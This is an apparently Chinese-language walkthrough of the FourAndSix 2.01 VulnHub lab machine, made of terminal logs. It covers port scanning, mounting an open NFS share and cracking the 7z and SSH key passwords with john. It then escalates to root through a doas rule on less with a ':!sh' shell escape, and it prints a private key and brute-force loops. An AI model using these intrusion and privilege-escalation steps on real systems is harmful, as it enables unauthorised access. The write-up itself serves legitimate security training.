FOURANDSIX: 2.01
https://www.vulnhub.com/entry/fourandsix-201,266/
主机发现
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:18:09]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.3
Host is up (0.011s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:18:14]
$ sudo nmap --min-rate 10000 -p- 192.168.54.3
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
649/tcp open cadview-3d
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:22:13]
$ sudo nmap -sT -sV -O -p22,111,649 192.168.54.3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
649/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:87:CE:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.4
Network Distance: 1 hop
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:22:58]
$ sudo nmap -sU -p22,111,649 192.168.54.3
PORT STATE SERVICE
22/udp closed ssh
111/udp open rpcbind
649/udp closed cadview-3d
MAC Address: 00:0C:29:87:CE:4E (VMware)
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:15:40]
$ sudo nmap -sC -sV -oN nmapScriptScan.log 192.168.54.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 09:15 CST
Nmap scan report for 192.168.54.3
Host is up (0.00061s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 ef3b2ecf40199ebb231eaa24a1094ed1 (RSA)
| 256 c85c8b0be1640c75c363d7b380c92fd2 (ECDSA)
|_ 256 61bc459abaa5472060132519b047cbad (ED25519)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 724/udp mountd
|_ 100005 1,3 752/tcp mountd
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:87:CE:4E (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.08 seconds
居然什么都没有~~
NFS 服务
查看nfs服务有没有类似的共享文件。
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:19:39]
$ showmount -e 192.168.54.3
Export list for 192.168.54.3:
/home/user/storage (everyone)
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:25:36]
$ mkdir nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:26:15] C:32
$ sudo mount -t nfs 192.168.54.3:/home/user/storage nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:26:47]
$ cd nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:26:56]
$ ls
backup.7z
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:29:28]
$ cp backup.7z ..
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:29:33]
$ cd ..
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:37]
$ ls
backup.7z nfsdir nmapScriptScan.log
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:40]
$ file backup.7z
backup.7z: 7-zip archive data, version 0.4
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:44]
$ binwalk backup.7z
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 7-zip archive data, version 0.4
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:57]
$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.utf8,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz (906E9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
ERROR: Data Error in encrypted file. Wrong password? : hello1.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello2.png
ERROR: Data Error in encrypted file. Wrong password? : hello3.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello4.png
ERROR: Data Error in encrypted file. Wrong password? : hello5.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello6.png
ERROR: Data Error in encrypted file. Wrong password? : hello7.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello8.jpeg
ERROR: Data Error in encrypted file. Wrong password? : id_rsa
ERROR: Data Error in encrypted file. Wrong password? : id_rsa.pub
Sub items Errors: 10
Archives with Errors: 1
Sub items Errors: 10
需要密码,那就john来干。
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:31:34] C:2
$ 7z2john backup.7z > backup.7z_hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:34:00] C:1
$ john --format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup.7z_hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate (backup.7z)
1g 0:00:00:00 DONE (2023-03-27 09:34) 1.162g/s 74.41p/s 74.41c/s 74.41C/s 123456..charlie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
查看解压出来的文件是否有包含。
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:14]
$ ls
backup.7z hello1.jpeg hello3.jpeg hello5.jpeg hello7.jpeg id_rsa nfsdir
backup.7z_hash hello2.png hello4.png hello6.png hello8.jpeg id_rsa.pub nmapScriptScan.log
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:16]
$ file hello*.*
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:18]
$ binwalk hello*.*
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello1.jpeg
MD5 Checksum: 36fd4beda9c0762f4f224150cd67ab07
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello2.png
MD5 Checksum: 36e1d982cfec8d61094bb630bf36c828
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 257 x 196, 8-bit colormap, non-interlaced
263 0x107 Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello3.jpeg
MD5 Checksum: 21116e89ae3a6b52ca9a88a4d2b4aa9f
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello4.png
MD5 Checksum: 0d8a3ad296f250880dac19e670be01f2
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 206 x 244, 8-bit colormap, non-interlaced
431 0x1AF Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello5.jpeg
MD5 Checksum: 51dabdddaf964782a9871b6d98d3ffec
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello6.png
MD5 Checksum: ce9003ed057a2c2c718915aba5d71e17
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 177 x 232, 8-bit colormap, non-interlaced
296 0x128 Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello7.jpeg
MD5 Checksum: e3a266075a99ab85f9e06523dd135c0a
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello8.jpeg
MD5 Checksum: 392e26dcb3e0f9a58fa49fcdc61c5e40
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:39:27]
$ exiftool hello*.* |grep "comment"
公钥私钥查看
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:39:35] C:1
$ file id_rsa id_rsa.pub
id_rsa: OpenSSH private key
id_rsa.pub: OpenSSH RSA public key
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:40:10]
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCmv/BkXU
N5gfqui9Z/92KAAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//
nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwS
inmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8
r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGr
rWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/i
RwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANnAAADwAO39g1ZtgarNJ
4hcnHTgx/DLgDeet1AhvBBsVjk94i8WLhy0luUvigJcMwHY6MgxL/ZNJfe3cZZ2/Rpo5g5
j5fzQ8vBHlglN9Z1GPVmeKdUHpRzrLFuARQOitYiWn9suwVafhgTS1hAof3Fqsik3pogEn
qp9pm39lalPVNgNVj6HCr2iJ0iq/MXjAmbgYxvpYXhzjyGzfPRlsw3y1T0pIxq3y9AzVBz
BCWF9x/GS1mXiDvGbNyb21ymn+NJq1eZKBN2LGJOHV2v+GGBkRTIYDsUpRbN56OJgu7Fyk
sECQIARA3ngs7tJhkGwtU7tIihiw/JlRtNu3GZwEsd5RVyX6cK8xGuaqlUulmm5E1CnxXz
3zj8MNhZtpDJaTpda83BhkxkSYb2svJ5rqO8HTYX2XtvPBEAN3U/dbcYVwNIdJ77TmckvS
tqvWi+DlZ6SL5Jlsj3WIFwXrmSIUQATA0jcF4d/FOoYOFTAQJ1y2pm97Q8UCErizu+SjfR
yQ7Q7QERsuAWBKthTGWkmzWKTYG8cpKso4lwbbjKJapfovEDtJgtFZpaX2+2YMMBx5AtaU
wNJShNYfIan4d8E2l6R77bBjqff4Qk1EMZzyXhG/Qe63buiCpUk6EevAf5Z2LXHJa4JYW3
PVcSXL3pbAOKEt6c36Q7CMHLmgOR9Be9wU/G+0FkDhdcgdkfOHaROfbK+RLhZ9tMO2peFP
POba2/Mw/kIK2Tepw7dQMvZ8KU+rBISeTE0YoSNYpt5A7ClskeLsXh9KCA/6Glnw+xKS+K
ewK2ooDck0EwHUmVQqC4qkXzbPbcj37WwMO3mzcQo7MARluOX8Y5b6JReqdhzvM5S7/uOb
cIblXwq9h71gTPirzhnn9QaJ/DnbGX4Ww7m8nkFkf9qwghWM+vKMjTxGSFHFXubk8l+5CG
fAOYC1igZMjKO5+2u60LMhtPjkGdUMbq0hv2FCxZW1ajlGwZIYWs2MLW7LGVSwC7re+fM2
1RaMxWvn73VjjooB+7hexe7l35mr5TyaZcQKCtJSNQRrGsSxHLUTEtvLY9FHOCnLgcsUzi
Tm826t9dvsrYHJh8W/wSqSYQ9t1niLg2MulioK6H8FTDAupkhZUkkbL0FEbe+Dl3cIeUW6
nXgaf6F+9tQHNQCI9QT1a/kGSGgQRRjuSdmVZieqdafJ7jHavLjzjcsiKQtjzkyaCp1hpa
dS6IZqF9DzlbtJRNlrO6Tq3j7gtL4DCURx2Jq13JO1hWDffIyrRZfgGeovGK/UAbTeTQ9M
rPy1AS6A==
-----END OPENSSH PRIVATE KEY-----
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:40:39]
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2
获得初始权限
使用 ssh -i id_rsa user@192.168.54.3
居然需要密码,那就john来干。
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:41:55] C:130
$ ssh2john id_rsa > id_rsa_hash
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:42:12]
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:01 DONE (2023-03-27 09:42) 0.6896g/s 44.13p/s 44.13c/s 44.13C/s 123456..charlie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:42:55]
$ ssh -i id_rsa user@192.168.54.3
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
fourandsix2$ whoami
user
fourandsix2$ ip a
ksh: ip: not found
fourandsix2$ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 32768
index 3 priority 0 llprio 3
groups: lo
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
lladdr 00:0c:29:87:ce:4e
index 1 priority 0 llprio 3
groups: egress
media: Ethernet autoselect (1000baseT full-duplex,master)
status: active
inet 192.168.54.3 netmask 0xffffff00 broadcast 192.168.54.255
enc0: flags=0<>
index 2 priority 0 llprio 3
groups: enc
status: active
pflog0: flags=141<UP,RUNNING,PROMISC> mtu 33136
index 4 priority 0 llprio 3
groups: pflog
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
提权
由于这个机器是OpenBSD,没有sudo-l
,有个doas指令类似,这里通过cat /etc/doas.conf
可以查看权限。
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
fourandsix2$ sudo -l
ksh: sudo: not found
fourandsix2$ find / -group user -type f 2>/dev/null
/home/user/.ssh/authorized_keys
/home/user/.Xdefaults
/home/user/.cshrc
/home/user/.cvsrc
/home/user/.login
/home/user/.mailrc
/home/user/.profile
/home/user/storage/backup.7z
/var/mail/user
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
这里less,有个v指令,就是先打开这个文件,然后按v,会启动vi去编辑当前文档,目前就是doas给到一个编辑权限,那这里先esc,然后输入:!sh
成功获得root权限。
fourandsix2$ doas /usr/bin/less /var/log/authlog
File modified since last write.
fourandsix2# whoami
root
fourandsix2# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 32768
index 3 priority 0 llprio 3
groups: lo
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
lladdr 00:0c:29:87:ce:4e
index 1 priority 0 llprio 3
groups: egress
media: Ethernet autoselect (1000baseT full-duplex,master)
status: active
inet 192.168.54.3 netmask 0xffffff00 broadcast 192.168.54.255
enc0: flags=0<>
index 2 priority 0 llprio 3
groups: enc
status: active
pflog0: flags=141<UP,RUNNING,PROMISC> mtu 33136
index 4 priority 0 llprio 3
groups: pflog
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42